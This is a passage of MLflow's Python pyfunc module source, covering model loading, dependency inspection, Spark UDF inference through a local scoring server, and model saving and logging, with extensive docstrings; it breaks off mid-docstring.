if not model_meta:
raise MlflowException("Model is missing metadata.")
self._model_meta = model_meta
self._model_impl = model_impl
def predict(self, data: PyFuncInput) -> PyFuncOutput:
"""
Generate model predictions.
        If the model contains a signature, enforce the input schema first before calling the
        model implementation with the sanitized input. If the pyfunc model does not include a
        model schema, the input is passed to the model implementation as is. See `Model
        Signature Enforcement
        <https://www.mlflow.org/docs/latest/models.html#signature-enforcement>`_ for more
        details.
:param data: Model input as one of pandas.DataFrame, numpy.ndarray,
scipy.sparse.(csc.csc_matrix | csr.csr_matrix), List[Any], or
Dict[str, numpy.ndarray]
:return: Model predictions as one of pandas.DataFrame, pandas.Series, numpy.ndarray or list.
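
        .. code-block:: python
            :caption: Example

            # A minimal sketch; assumes ``model`` was returned by
            # mlflow.pyfunc.load_model() and expects a single column "x".
            import pandas as pd

            preds = model.predict(pd.DataFrame({"x": [1.0, 2.0]}))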
"""
input_schema = self.metadata.get_input_schema()
if input_schema is not None:
data = _enforce_schema(data, input_schema)
return self._model_impl.predict(data)
@property
def metadata(self):
"""Model metadata."""
if self._model_meta is None:
raise MlflowException("Model is missing metadata.")
return self._model_meta
def __repr__(self):
info = {}
if self._model_meta is not None:
if hasattr(self._model_meta, "run_id") and self._model_meta.run_id is not None:
info["run_id"] = self._model_meta.run_id
if (
hasattr(self._model_meta, "artifact_path")
and self._model_meta.artifact_path is not None
):
info["artifact_path"] = self._model_meta.artifact_path
info["flavor"] = self._model_meta.flavors[FLAVOR_NAME]["loader_module"]
return yaml.safe_dump({"mlflow.pyfunc.loaded_model": info}, default_flow_style=False)
def _warn_dependency_requirement_mismatches(model_path):
"""
Inspects the model's dependencies and prints a warning if the current Python environment
doesn't satisfy them.
"""
req_file_path = os.path.join(model_path, _REQUIREMENTS_FILE_NAME)
if not os.path.exists(req_file_path):
return
try:
mismatch_infos = []
for req in _parse_requirements(req_file_path, is_constraint=False):
req_line = req.req_str
mismatch_info = _check_requirement_satisfied(req_line)
if mismatch_info is not None:
mismatch_infos.append(str(mismatch_info))
if len(mismatch_infos) > 0:
mismatch_str = " - " + "\n - ".join(mismatch_infos)
warning_msg = (
"Detected one or more mismatches between the model's dependencies and the current "
f"Python environment:\n{mismatch_str}\n"
"To fix the mismatches, call `mlflow.pyfunc.get_model_dependencies(model_uri)` "
"to fetch the model's environment and install dependencies using the resulting "
"environment file."
)
_logger.warning(warning_msg)
except Exception as e:
_logger.warning(
f"Encountered an unexpected error ({repr(e)}) while detecting model dependency "
"mismatches. Set logging level to DEBUG to see the full traceback."
)
_logger.debug("", exc_info=True)
def load_model(
model_uri: str, suppress_warnings: bool = False, dst_path: str = None
) -> PyFuncModel:
"""
Load a model stored in Python function format.
:param model_uri: The location, in URI format, of the MLflow model. For example:
- ``/Users/me/path/to/local/model``
- ``relative/path/to/local/model``
- ``s3://my_bucket/path/to/model``
- ``runs:/<mlflow_run_id>/run-relative/path/to/model``
- ``models:/<model_name>/<model_version>``
- ``models:/<model_name>/<stage>``
- ``mlflow-artifacts:/path/to/model``
For more information about supported URI schemes, see
`Referencing Artifacts <https://www.mlflow.org/docs/latest/concepts.html#
artifact-locations>`_.
:param suppress_warnings: If ``True``, non-fatal warning messages associated with the model
loading process will be suppressed. If ``False``, these warning
messages will be emitted.
:param dst_path: The local filesystem path to which to download the model artifact.
This directory must already exist. If unspecified, a local output
path will be created.
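
    .. code-block:: python
        :caption: Example

        # A minimal sketch; the run ID placeholder must refer to a real logged model.
        import mlflow.pyfunc

        model = mlflow.pyfunc.load_model("runs:/<mlflow_run_id>/model")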
"""
local_path = _download_artifact_from_uri(artifact_uri=model_uri, output_path=dst_path)
if not suppress_warnings:
_warn_dependency_requirement_mismatches(local_path)
model_meta = Model.load(os.path.join(local_path, MLMODEL_FILE_NAME))
conf = model_meta.flavors.get(FLAVOR_NAME)
if conf is None:
raise MlflowException(
'Model does not have the "{flavor_name}" flavor'.format(flavor_name=FLAVOR_NAME),
RESOURCE_DOES_NOT_EXIST,
)
model_py_version = conf.get(PY_VERSION)
if not suppress_warnings:
_warn_potentially_incompatible_py_version_if_necessary(model_py_version=model_py_version)
_add_code_from_conf_to_system_path(local_path, conf, code_key=CODE)
data_path = os.path.join(local_path, conf[DATA]) if (DATA in conf) else local_path
model_impl = importlib.import_module(conf[MAIN])._load_pyfunc(data_path)
return PyFuncModel(model_meta=model_meta, model_impl=model_impl)
def _download_model_conda_env(model_uri):
conda_yml_file_name = _get_flavor_configuration_from_uri(model_uri, FLAVOR_NAME)[ENV]
return _download_artifact_from_uri(append_to_uri_path(model_uri, conda_yml_file_name))
def _get_model_dependencies(model_uri, format="pip"): # pylint: disable=redefined-builtin
if format == "pip":
req_file_uri = append_to_uri_path(model_uri, _REQUIREMENTS_FILE_NAME)
try:
return _download_artifact_from_uri(req_file_uri)
except Exception as e:
# fallback to download conda.yaml file and parse the "pip" section from it.
_logger.info(
f"Downloading model '{_REQUIREMENTS_FILE_NAME}' file failed, error is {repr(e)}. "
"Falling back to fetching pip requirements from the model's 'conda.yaml' file. "
"Other conda dependencies will be ignored."
)
conda_yml_path = _download_model_conda_env(model_uri)
with open(conda_yml_path, "r") as yf:
conda_yml = yaml.safe_load(yf)
conda_deps = conda_yml.get("dependencies", [])
for index, dep in enumerate(conda_deps):
if isinstance(dep, dict) and "pip" in dep:
pip_deps_index = index
break
else:
raise MlflowException(
"No pip section found in conda.yaml file in the model directory.",
error_code=RESOURCE_DOES_NOT_EXIST,
)
pip_deps = conda_deps.pop(pip_deps_index)["pip"]
tmp_dir = tempfile.mkdtemp()
pip_file_path = os.path.join(tmp_dir, _REQUIREMENTS_FILE_NAME)
with open(pip_file_path, "w") as f:
f.write("\n".join(pip_deps) + "\n")
if len(conda_deps) > 0:
_logger.warning(
"The following conda dependencies have been excluded from the environment file:"
f" {', '.join(conda_deps)}."
)
return pip_file_path
elif format == "conda":
conda_yml_path = _download_model_conda_env(model_uri)
return conda_yml_path
else:
raise MlflowException(
f"Illegal format argument '{format}'.", error_code=INVALID_PARAMETER_VALUE
)
def get_model_dependencies(model_uri, format="pip"): # pylint: disable=redefined-builtin
"""
:param model_uri: The uri of the model to get dependencies from.
:param format: The format of the returned dependency file. If the ``"pip"`` format is
specified, the path to a pip ``requirements.txt`` file is returned.
If the ``"conda"`` format is specified, the path to a ``"conda.yaml"``
                   file is returned. If the ``"pip"`` format is specified but the model
was not saved with a ``requirements.txt`` file, the ``pip`` section
of the model's ``conda.yaml`` file is extracted instead, and any
additional conda dependencies are ignored. Default value is ``"pip"``.
:return: The local filesystem path to either a pip ``requirements.txt`` file
(if ``format="pip"``) or a ``conda.yaml`` file (if ``format="conda"``)
specifying the model's dependencies.
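
    .. code-block:: python
        :caption: Example

        # A minimal sketch; the URI is a placeholder for a previously logged model.
        import mlflow.pyfunc

        deps = mlflow.pyfunc.get_model_dependencies("runs:/<mlflow_run_id>/model")
        # `deps` is a local path to a requirements.txt file usable with pip install -r.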
"""
dep_file = _get_model_dependencies(model_uri, format)
if format == "pip":
prefix = "%" if is_in_databricks_runtime() else ""
_logger.info(
"To install these model dependencies, run the "
f"following command: '{prefix}pip install -r {dep_file}'."
)
return dep_file
@deprecated("mlflow.pyfunc.load_model", 1.0)
def load_pyfunc(model_uri, suppress_warnings=False):
"""
Load a model stored in Python function format.
:param model_uri: The location, in URI format, of the MLflow model. For example:
- ``/Users/me/path/to/local/model``
- ``relative/path/to/local/model``
- ``s3://my_bucket/path/to/model``
- ``runs:/<mlflow_run_id>/run-relative/path/to/model``
- ``models:/<model_name>/<model_version>``
- ``models:/<model_name>/<stage>``
- ``mlflow-artifacts:/path/to/model``
For more information about supported URI schemes, see
`Referencing Artifacts <https://www.mlflow.org/docs/latest/concepts.html#
artifact-locations>`_.
:param suppress_warnings: If ``True``, non-fatal warning messages associated with the model
loading process will be suppressed. If ``False``, these warning
messages will be emitted.
"""
return load_model(model_uri, suppress_warnings)
def _warn_potentially_incompatible_py_version_if_necessary(model_py_version=None):
"""
Compares the version of Python that was used to save a given model with the version
of Python that is currently running. If a major or minor version difference is detected,
logs an appropriate warning.
"""
if model_py_version is None:
_logger.warning(
"The specified model does not have a specified Python version. It may be"
" incompatible with the version of Python that is currently running: Python %s",
PYTHON_VERSION,
)
elif get_major_minor_py_version(model_py_version) != get_major_minor_py_version(PYTHON_VERSION):
_logger.warning(
"The version of Python that the model was saved in, `Python %s`, differs"
" from the version of Python that is currently running, `Python %s`,"
" and may be incompatible",
model_py_version,
PYTHON_VERSION,
)
def _get_or_create_model_cache_dir():
nfs_root_dir = get_nfs_cache_root_dir()
if nfs_root_dir is not None:
        # On Databricks, '/local_disk0/.ephemeral_nfs' is mounted as an NFS disk;
        # data stored on it is shared with all remote nodes.
root_dir = os.path.join(nfs_root_dir, "models")
os.makedirs(root_dir, exist_ok=True)
tmp_model_dir = tempfile.mkdtemp(dir=root_dir)
# TODO: register deleting tmp_model_dir handler when exit
else:
import atexit
import shutil
tmp_model_dir = tempfile.mkdtemp()
atexit.register(shutil.rmtree, tmp_model_dir, ignore_errors=True)
return tmp_model_dir
_MLFLOW_SERVER_OUTPUT_TAIL_LINES_TO_KEEP = 200
def spark_udf(spark, model_uri, result_type="double", env_manager="local"):
"""
A Spark UDF that can be used to invoke the Python function formatted model.
Parameters passed to the UDF are forwarded to the model as a DataFrame where the column names
are ordinals (0, 1, ...). On some versions of Spark (3.0 and above), it is also possible to
wrap the input in a struct. In that case, the data will be passed as a DataFrame with column
names given by the struct definition (e.g. when invoked as my_udf(struct('x', 'y')), the model
will get the data as a pandas DataFrame with 2 columns 'x' and 'y').
If a model contains a signature, the UDF can be called without specifying column name
arguments. In this case, the UDF will be called with column names from signature, so the
evaluation dataframe's column names must match the model signature's column names.
The predictions are filtered to contain only the columns that can be represented as the
``result_type``. If the ``result_type`` is string or array of strings, all predictions are
    converted to string. If the result type is not an array type, the leftmost column with
matching type is returned.
NOTE: Inputs of type ``pyspark.sql.types.DateType`` are not supported on earlier versions of
Spark (2.4 and below).
.. code-block:: python
:caption: Example
from pyspark.sql.functions import struct
predict = mlflow.pyfunc.spark_udf(spark, "/my/local/model")
df.withColumn("prediction", predict(struct("name", "age"))).show()
:param spark: A SparkSession object.
:param model_uri: The location, in URI format, of the MLflow model with the
:py:mod:`mlflow.pyfunc` flavor. For example:
- ``/Users/me/path/to/local/model``
- ``relative/path/to/local/model``
- ``s3://my_bucket/path/to/model``
- ``runs:/<mlflow_run_id>/run-relative/path/to/model``
- ``models:/<model_name>/<model_version>``
- ``models:/<model_name>/<stage>``
- ``mlflow-artifacts:/path/to/model``
For more information about supported URI schemes, see
`Referencing Artifacts <https://www.mlflow.org/docs/latest/concepts.html#
artifact-locations>`_.
:param result_type: the return type of the user-defined function. The value can be either a
``pyspark.sql.types.DataType`` object or a DDL-formatted type string. Only a primitive
type or an array ``pyspark.sql.types.ArrayType`` of primitive type are allowed.
The following classes of result type are supported:
- "int" or ``pyspark.sql.types.IntegerType``: The leftmost integer that can fit in an
``int32`` or an exception if there is none.
- "long" or ``pyspark.sql.types.LongType``: The leftmost long integer that can fit in an
``int64`` or an exception if there is none.
- ``ArrayType(IntegerType|LongType)``: All integer columns that can fit into the requested
size.
- "float" or ``pyspark.sql.types.FloatType``: The leftmost numeric result cast to
``float32`` or an exception if there is none.
- "double" or ``pyspark.sql.types.DoubleType``: The leftmost numeric result cast to
``double`` or an exception if there is none.
- ``ArrayType(FloatType|DoubleType)``: All numeric columns cast to the requested type or
an exception if there are no numeric columns.
- "string" or ``pyspark.sql.types.StringType``: The leftmost column converted to ``string``.
- ``ArrayType(StringType)``: All columns converted to ``string``.
:param env_manager: The environment manager to use in order to create the
                        software environment for model inference. Default value is ``local``.
                        The following values are supported:
- ``conda``: (Recommended) Use Conda to restore the software environment
that was used to train the model. Note that environment is only restored
in the context of the PySpark UDF; the software environment outside of
the UDF is unaffected.
- ``local``: Use the current Python environment for model inference, which
may differ from the environment used to train the model and may lead to
errors or invalid predictions.
:return: Spark UDF that applies the model's ``predict`` method to the data and returns a
type specified by ``result_type``, which by default is a double.
"""
# Scope Spark import to this method so users don't need pyspark to use non-Spark-related
# functionality.
import functools
from mlflow.pyfunc.spark_model_cache import SparkModelCache
from mlflow.utils._spark_utils import _SparkDirectoryDistributor
from pyspark.sql.functions import pandas_udf
from pyspark.sql.types import _parse_datatype_string
from pyspark.sql.types import (
ArrayType,
DataType as SparkDataType,
StructType as SparkStructType,
)
from pyspark.sql.types import DoubleType, IntegerType, FloatType, LongType, StringType
from mlflow.models.cli import _get_flavor_backend
env_manager = _EnvManager.from_string(env_manager)
    # Check whether Spark is in local or local-cluster mode;
    # in that case all executors and the driver share the same filesystem.
is_spark_in_local_mode = spark.conf.get("spark.master").startswith("local")
    # TODO: change `should_use_nfs` to `get_nfs_cache_root_dir() is not None`
    # once the NFS optimization is added.
should_use_nfs = False
should_use_spark_to_broadcast_file = not (is_spark_in_local_mode or should_use_nfs)
if not isinstance(result_type, SparkDataType):
result_type = _parse_datatype_string(result_type)
elem_type = result_type
if isinstance(elem_type, ArrayType):
elem_type = elem_type.elementType
supported_types = [IntegerType, LongType, FloatType, DoubleType, StringType]
if not any([isinstance(elem_type, x) for x in supported_types]):
raise MlflowException(
message="Invalid result_type '{}'. Result type can only be one of or an array of one "
"of the following types: {}".format(str(elem_type), str(supported_types)),
error_code=INVALID_PARAMETER_VALUE,
)
local_model_path = _download_artifact_from_uri(
artifact_uri=model_uri, output_path=_get_or_create_model_cache_dir()
)
if env_manager is _EnvManager.LOCAL:
# Assume the spark executor's python environment is the same as the spark driver's.
_warn_dependency_requirement_mismatches(local_model_path)
_logger.warning(
'Calling `spark_udf()` with `env_manager="local"` does not recreate the same '
"environment that was used during training, which may lead to errors or inaccurate "
'predictions. We recommend specifying `env_manager="conda"`, which automatically '
"recreates the environment that was used to train the model and performs inference "
"in the recreated environment."
)
else:
_logger.info(
"This UDF will use Conda to recreate the model's software environment for inference. "
"This may take extra time during execution."
)
if not sys.platform.startswith("linux"):
# TODO: support killing mlflow server launched in UDF task when spark job canceled
# for non-linux system.
# https://stackoverflow.com/questions/53208/how-do-i-automatically-destroy-child-processes-in-windows
_logger.warning(
"In order to run inference code in restored python environment, PySpark UDF "
"processes spawn MLflow Model servers as child processes. Due to system "
"limitations with handling SIGKILL signals, these MLflow Model server child "
"processes cannot be cleaned up if the Spark Job is canceled."
)
if not should_use_spark_to_broadcast_file:
# Prepare restored environment in driver side if possible.
if env_manager is _EnvManager.CONDA:
_get_flavor_backend(
local_model_path, env_manager=_EnvManager.CONDA, install_mlflow=False
).prepare_env(model_uri=local_model_path, capture_output=False)
# Broadcast local model directory to remote worker if needed.
if should_use_spark_to_broadcast_file:
archive_path = SparkModelCache.add_local_model(spark, local_model_path)
model_metadata = Model.load(os.path.join(local_model_path, MLMODEL_FILE_NAME))
def _predict_row_batch(predict_fn, args):
input_schema = model_metadata.get_input_schema()
pdf = None
for x in args:
if type(x) == pandas.DataFrame:
if len(args) != 1:
raise Exception(
"If passing a StructType column, there should be only one "
"input column, but got %d" % len(args)
)
pdf = x
if pdf is None:
args = list(args)
if input_schema is None:
names = [str(i) for i in range(len(args))]
else:
names = input_schema.input_names()
if len(args) > len(names):
args = args[: len(names)]
if len(args) < len(names):
raise MlflowException(
"Model input is missing columns. Expected {0} input columns {1},"
" but the model received only {2} unnamed input columns"
" (Since the columns were passed unnamed they are expected to be in"
" the order specified by the schema).".format(len(names), names, len(args))
)
pdf = pandas.DataFrame(data={names[i]: x for i, x in enumerate(args)}, columns=names)
result = predict_fn(pdf)
if not isinstance(result, pandas.DataFrame):
result = pandas.DataFrame(data=result)
elem_type = result_type.elementType if isinstance(result_type, ArrayType) else result_type
if type(elem_type) == IntegerType:
result = result.select_dtypes(
[np.byte, np.ubyte, np.short, np.ushort, np.int32]
).astype(np.int32)
elif type(elem_type) == LongType:
result = result.select_dtypes([np.byte, np.ubyte, np.short, np.ushort, int])
elif type(elem_type) == FloatType:
result = result.select_dtypes(include=(np.number,)).astype(np.float32)
elif type(elem_type) == DoubleType:
result = result.select_dtypes(include=(np.number,)).astype(np.float64)
if len(result.columns) == 0:
raise MlflowException(
message="The the model did not produce any values compatible with the requested "
"type '{}'. Consider requesting udf with StringType or "
"Arraytype(StringType).".format(str(elem_type)),
error_code=INVALID_PARAMETER_VALUE,
)
if type(elem_type) == StringType:
result = result.applymap(str)
if type(result_type) == ArrayType:
return pandas.Series(result.to_numpy().tolist())
else:
return result[result.columns[0]]
result_type_hint = (
pandas.DataFrame if isinstance(result_type, SparkStructType) else pandas.Series
)
@pandas_udf(result_type)
def udf(
iterator: Iterator[Tuple[Union[pandas.Series, pandas.DataFrame], ...]]
) -> Iterator[result_type_hint]:
# importing here to prevent circular import
from mlflow.pyfunc.scoring_server.client import ScoringServerClient
# Note: this is a pandas udf function in iterator style, which takes an iterator of
# tuples of pandas.Series and outputs an iterator of pandas.Series.
scoring_server_proc = None
# TODO: Support virtual env.
#
# TODO: For conda/virtualenv restored env cases,
# For each individual python process (driver side), create individual and temporary
# conda env dir / virtualenv env dir and when process exit,
# delete the temporary env dir.
# The reasons are:
# 1. The env dir might be large, so cleaning it up when the process exits
# helps save disk space.
# 2. The conda package cache dir and pip cache dir are shared across all
# python processes, which helps reduce download time.
# 3. It avoids race-condition-related issues.
#
# TODO:
# For NFS available case, set conda env dir / virtualenv env dir in sub-directory under
# NFS directory, and in spark driver side prepare restored env once, and then all
# spark UDF tasks running on spark workers can skip re-creating the restored env.
if env_manager is _EnvManager.CONDA:
server_port = find_free_port()
if should_use_spark_to_broadcast_file:
local_model_path_on_executor = _SparkDirectoryDistributor.get_or_extract(
archive_path
)
# Call "prepare_env" in advance in order to reduce scoring server launch time.
# So that we can use a shorter timeout when call `client.wait_server_ready`,
# otherwise we have to set a long timeout for `client.wait_server_ready` time,
# this prevents spark UDF task failing fast if other exception raised when scoring
# server launching.
_get_flavor_backend(
local_model_path_on_executor,
env_manager=_EnvManager.CONDA,
install_mlflow=False,
).prepare_env(model_uri=local_model_path_on_executor, capture_output=True)
else:
local_model_path_on_executor = local_model_path
# launch scoring server
# TODO: adjust timeout for server requests handler.
scoring_server_proc = _get_flavor_backend(
local_model_path_on_executor,
env_manager=_EnvManager.CONDA,
workers=1,
install_mlflow=False,
).serve(
model_uri=local_model_path_on_executor,
port=server_port,
host="127.0.0.1",
enable_mlserver=False,
synchronous=False,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
server_tail_logs = collections.deque(maxlen=_MLFLOW_SERVER_OUTPUT_TAIL_LINES_TO_KEEP)
def server_redirect_log_thread_func(child_stdout):
for line in child_stdout:
if isinstance(line, bytes):
decoded = line.decode()
else:
decoded = line
server_tail_logs.append(decoded)
sys.stdout.write("[model server] " + decoded)
server_redirect_log_thread = threading.Thread(
target=server_redirect_log_thread_func, args=(scoring_server_proc.stdout,)
)
server_redirect_log_thread.daemon = True
server_redirect_log_thread.start()
client = ScoringServerClient("127.0.0.1", server_port)
try:
client.wait_server_ready(timeout=90, scoring_server_proc=scoring_server_proc)
except Exception:
err_msg = "During spark UDF task execution, mlflow model server failed to launch. "
if len(server_tail_logs) == _MLFLOW_SERVER_OUTPUT_TAIL_LINES_TO_KEEP:
err_msg += (
f"Last {_MLFLOW_SERVER_OUTPUT_TAIL_LINES_TO_KEEP} "
"lines of MLflow model server output:\n"
)
else:
err_msg += "MLflow model server output:\n"
err_msg += "".join(server_tail_logs)
raise MlflowException(err_msg)
def batch_predict_fn(pdf):
return client.invoke(pdf)
elif env_manager is _EnvManager.LOCAL:
if should_use_spark_to_broadcast_file:
loaded_model, _ = SparkModelCache.get_or_load(archive_path)
else:
loaded_model = mlflow.pyfunc.load_model(local_model_path)
def batch_predict_fn(pdf):
return loaded_model.predict(pdf)
try:
for input_batch in iterator:
# If the UDF is called with multiple arguments,
# `input_batch` is a tuple composed of several pd.Series/pd.DataFrame
# objects.
# If the UDF is called with only one argument,
# `input_batch` will be a single `pd.Series`/`pd.DataFrame` instance.
if isinstance(input_batch, (pandas.Series, pandas.DataFrame)):
# UDF is called with only one argument
row_batch_args = (input_batch,)
else:
row_batch_args = input_batch
yield _predict_row_batch(batch_predict_fn, row_batch_args)
finally:
if scoring_server_proc is not None:
os.kill(scoring_server_proc.pid, signal.SIGTERM)
udf.metadata = model_metadata
@functools.wraps(udf)
def udf_with_default_cols(*args):
if len(args) == 0:
input_schema = model_metadata.get_input_schema()
if input_schema and len(input_schema.inputs) > 0:
if input_schema.has_input_names():
input_names = input_schema.input_names()
return udf(*input_names)
else:
raise MlflowException(
message="Cannot apply udf because no column names specified. The udf "
"expects {} columns with types: {}. Input column names could not be "
"inferred from the model signature (column names not found).".format(
len(input_schema.inputs),
input_schema.inputs,
),
error_code=INVALID_PARAMETER_VALUE,
)
else:
raise MlflowException(
"Attempting to apply udf on zero columns because no column names were "
"specified as arguments or inferred from the model signature.",
error_code=INVALID_PARAMETER_VALUE,
)
else:
return udf(*args)
return udf_with_default_cols
@format_docstring(LOG_MODEL_PARAM_DOCS.format(package_name="scikit-learn"))
def save_model(
path,
loader_module=None,
data_path=None,
code_path=None,
conda_env=None,
mlflow_model=None,
python_model=None,
artifacts=None,
signature: ModelSignature = None,
input_example: ModelInputExample = None,
pip_requirements=None,
extra_pip_requirements=None,
**kwargs,
):
"""
save_model(path, loader_module=None, data_path=None, code_path=None, conda_env=None,\
mlflow_model=Model(), python_model=None, artifacts=None)
Save a Pyfunc model with custom inference logic and optional data dependencies to a path on the
local filesystem.
For information about the workflows that this method supports, please see :ref:`"workflows for
creating custom pyfunc models" <pyfunc-create-custom-workflows>` and
:ref:`"which workflow is right for my use case?" <pyfunc-create-custom-selecting-workflow>`.
Note that the parameters for the second workflow (``loader_module``, ``data_path``) and the
parameters for the first workflow (``python_model``, ``artifacts``) cannot be
specified together.
:param path: The path to which to save the Python model.
:param loader_module: The name of the Python module that is used to load the model
from ``data_path``. This module must define a method with the prototype
``_load_pyfunc(data_path)``. If not ``None``, this module and its
dependencies must be included in one of the following locations:
- The MLflow library.
- Package(s) listed in the model's Conda environment, specified by
the ``conda_env`` parameter.
- One or more of the files specified by the ``code_path`` parameter.
:param data_path: Path to a file or directory containing model data.
:param code_path: A list of local filesystem paths to Python file dependencies (or directories
containing file dependencies). These files are *prepended* to the system
path before the model is loaded.
:param conda_env: {{ conda_env }}
:param mlflow_model: :py:mod:`mlflow.models.Model` configuration to which to add the
**python_function** flavor.
:param python_model: An instance of a subclass of :class:`~PythonModel`. This class is
serialized using the CloudPickle library. Any dependencies of the class
should be included in one of the following locations:
- The MLflow library.
- Package(s) listed in the model's Conda environment, specified by
the ``conda_env`` parameter.
- One or more of the files specified by the ``code_path`` parameter.
Note: If the class is imported from another module, as opposed to being
defined in the ``__main__`` scope, the defining module should also be
included in one of the listed locations.
:param artifacts: A dictionary containing ``<name, artifact_uri>`` entries. Remote artifact URIs
are resolved to absolute filesystem paths, producing a dictionary of
``<name, absolute_path>`` entries. ``python_model`` can reference these
resolved entries as the ``artifacts`` property of the ``context`` parameter
in :func:`PythonModel.load_context() <mlflow.pyfunc.PythonModel.load_context>`
and :func:`PythonModel.predict() <mlflow.pyfunc.PythonModel.predict>`.
For example, consider the following ``artifacts`` dictionary::
{
"my_file": "s3://my-bucket/path/to/my/file"
}
In this case, the ``"my_file"`` artifact is downloaded from S3. The
``python_model`` can then refer to ``"my_file"`` as an absolute filesystem
path via ``context.artifacts["my_file"]``.
If ``None``, no artifacts are added to the model.
:param signature: :py:class:`ModelSignature <mlflow.models.ModelSignature>`
describes model input and output :py:class:`Schema <mlflow.types.Schema>`.
The model signature can be :py:func:`inferred <mlflow.models.infer_signature>`
from datasets with valid model input (e.g. the training dataset with target
column omitted) and valid model output (e.g. model predictions generated on
the training dataset), for example:
.. code-block:: python
from mlflow.models.signature import infer_signature
train = df.drop_column("target_label")
predictions = ... # compute model predictions
signature = infer_signature(train, predictions)
:param input_example: Input example provides one or several instances of valid
model input. The example can be used as a hint of what data to feed the
model. The given example can be a Pandas DataFrame, in which case it
will be serialized to json using the Pandas split-oriented format, or a
numpy array, in which case it will be serialized to json by converting
it to a list. Bytes are base64-encoded.
:param pip_requirements: {{ pip_requirements }}
:param extra_pip_requirements: {{ extra_pip_requirements }}
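Example (a minimal sketch of the ``python_model`` workflow; ``AddN`` and the
destination path are illustrative):
.. code-block:: python
import mlflow.pyfunc
class AddN(mlflow.pyfunc.PythonModel):
    def __init__(self, n):
        self.n = n
    def predict(self, context, model_input):
        return model_input.apply(lambda column: column + self.n)
mlflow.pyfunc.save_model(path="add_n_model", python_model=AddN(n=5))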
"""
_validate_env_arguments(conda_env, pip_requirements, extra_pip_requirements)
mlflow_model = kwargs.pop("model", mlflow_model)
if len(kwargs) > 0:
raise TypeError("save_model() got unexpected keyword arguments: {}".format(kwargs))
if code_path is not None:
if not isinstance(code_path, list):
raise TypeError("Argument code_path should be a list, not {}".format(type(code_path)))
first_argument_set = {
"loader_module": loader_module,
"data_path": data_path,
}
second_argument_set = {
"artifacts": artifacts,
"python_model": python_model,
}
first_argument_set_specified = any([item is not None for item in first_argument_set.values()])
second_argument_set_specified = any([item is not None for item in second_argument_set.values()])
if first_argument_set_specified and second_argument_set_specified:
raise MlflowException(
message=(
"The following sets of parameters cannot be specified together: {first_set_keys}"
" and {second_set_keys}. All parameters in one set must be `None`. Instead, found"
" the following values: {first_set_entries} and {second_set_entries}".format(
first_set_keys=first_argument_set.keys(),
second_set_keys=second_argument_set.keys(),
first_set_entries=first_argument_set,
second_set_entries=second_argument_set,
)
),
error_code=INVALID_PARAMETER_VALUE,
)
elif (loader_module is None) and (python_model is None):
msg = (
"Either `loader_module` or `python_model` must be specified. A `loader_module` "
"should be a python module. A `python_model` should be a subclass of PythonModel"
)
raise MlflowException(message=msg, error_code=INVALID_PARAMETER_VALUE)
_validate_and_prepare_target_save_path(path)
if mlflow_model is None:
mlflow_model = Model()
if signature is not None:
mlflow_model.signature = signature
if input_example is not None:
_save_example(mlflow_model, input_example, path)
if first_argument_set_specified:
return _save_model_with_loader_module_and_data_path(
path=path,
loader_module=loader_module,
data_path=data_path,
code_paths=code_path,
conda_env=conda_env,
mlflow_model=mlflow_model,
pip_requirements=pip_requirements,
extra_pip_requirements=extra_pip_requirements,
)
elif second_argument_set_specified:
return mlflow.pyfunc.model._save_model_with_class_artifacts_params(
path=path,
python_model=python_model,
artifacts=artifacts,
conda_env=conda_env,
code_paths=code_path,
mlflow_model=mlflow_model,
pip_requirements=pip_requirements,
extra_pip_requirements=extra_pip_requirements,
)
@format_docstring(LOG_MODEL_PARAM_DOCS.format(package_name="scikit-learn"))
def log_model(
artifact_path,
loader_module=None,
data_path=None,
code_path=None,
conda_env=None,
python_model=None,
artifacts=None,
registered_model_name=None,
signature: ModelSignature = None,
input_example: ModelInputExample = None,
await_registration_for=DEFAULT_AWAIT_MAX_SLEEP_SECONDS,
pip_requirements=None,
extra_pip_requirements=None,
):
"""
Log a Pyfunc model with custom inference logic and optional data dependencies as an MLflow
artifact for the current run.
For information about the workflows that this method supports, see :ref:`Workflows for
creating custom pyfunc models <pyfunc-create-custom-workflows>` and
:ref:`Which workflow is right for my use case? <pyfunc-create-custom-selecting-workflow>`.
You cannot specify the parameters for the second workflow (``loader_module``, ``data_path``)
together with the parameters for the first workflow (``python_model``, ``artifacts``).
:param artifact_path: The run-relative artifact path to which to log the Python model.
:param loader_module: The name of the Python module that is used to load the model
from ``data_path``. This module must define a method with the prototype
``_load_pyfunc(data_path)``. If not ``None``, this module and its
dependencies must be included in one of the following locations:
- The MLflow library.
- Package(s) listed in the model's Conda environment, specified by
the ``conda_env`` parameter.
- One or more of the files specified by the ``code_path`` parameter.
:param data_path: Path to a file or directory containing model data.
:param code_path: A list of local filesystem paths to Python file dependencies (or directories
containing file dependencies). These files are *prepended* to the system
path before the model is loaded.
:param conda_env: {{ conda_env }}
:param python_model: An instance of a subclass of :class:`~PythonModel`. This class is
serialized using the CloudPickle library. Any dependencies of the class
should be included in one of the following locations:
- The MLflow library.
- Package(s) listed in the model's Conda environment, specified by
the ``conda_env`` parameter.
- One or more of the files specified by the ``code_path`` parameter.
Note: If the class is imported from another module, as opposed to being
defined in the ``__main__`` scope, the defining module should also be
included in one of the listed locations.
:param artifacts: A dictionary containing ``<name, artifact_uri>`` entries. Remote artifact URIs
are resolved to absolute filesystem paths, producing a dictionary of
``<name, absolute_path>`` entries. ``python_model`` can reference these
resolved entries as the ``artifacts`` property of the ``context`` parameter
in :func:`PythonModel.load_context() <mlflow.pyfunc.PythonModel.load_context>`
and :func:`PythonModel.predict() <mlflow.pyfunc.PythonModel.predict>`.
For example, consider the following ``artifacts`` dictionary::
{
"my_file": "s3://my-bucket/path/to/my/file"
}
In this case, the ``"my_file"`` artifact is downloaded from S3. The
``python_model`` can then refer to ``"my_file"`` as an absolute filesystem
path via ``context.artifacts["my_file"]``.
If ``None``, no artifacts are added to the model.
:param registered_model_name: This argument may change or be removed in a
future release without warning. If given, create a model
version under ``registered_model_name``, also creating a
registered model if one with the given name does not exist.
:param signature: :py:class:`ModelSignature <mlflow.models.ModelSignature>`
describes model input and output :py:class:`Schema <mlflow.types.Schema>`.
The model signature can be :py:func:`inferred <mlflow.models.infer_signature>`
from datasets with valid model input (e.g. the training dataset with target
column omitted) and valid model output (e.g. model predictions generated on
the training dataset), for example:
.. code-block:: python
from mlflow.models.signature import infer_signature
train = df.drop_column("target_label")
predictions = ... # compute model predictions
signature = infer_signature(train, predictions)
:param input_example: Input example provides one or several instances of valid
model input. The example can be used as a hint of what data to feed the
model. The given example can be a Pandas DataFrame, in which case it
will be serialized to json using the Pandas split-oriented format, or a
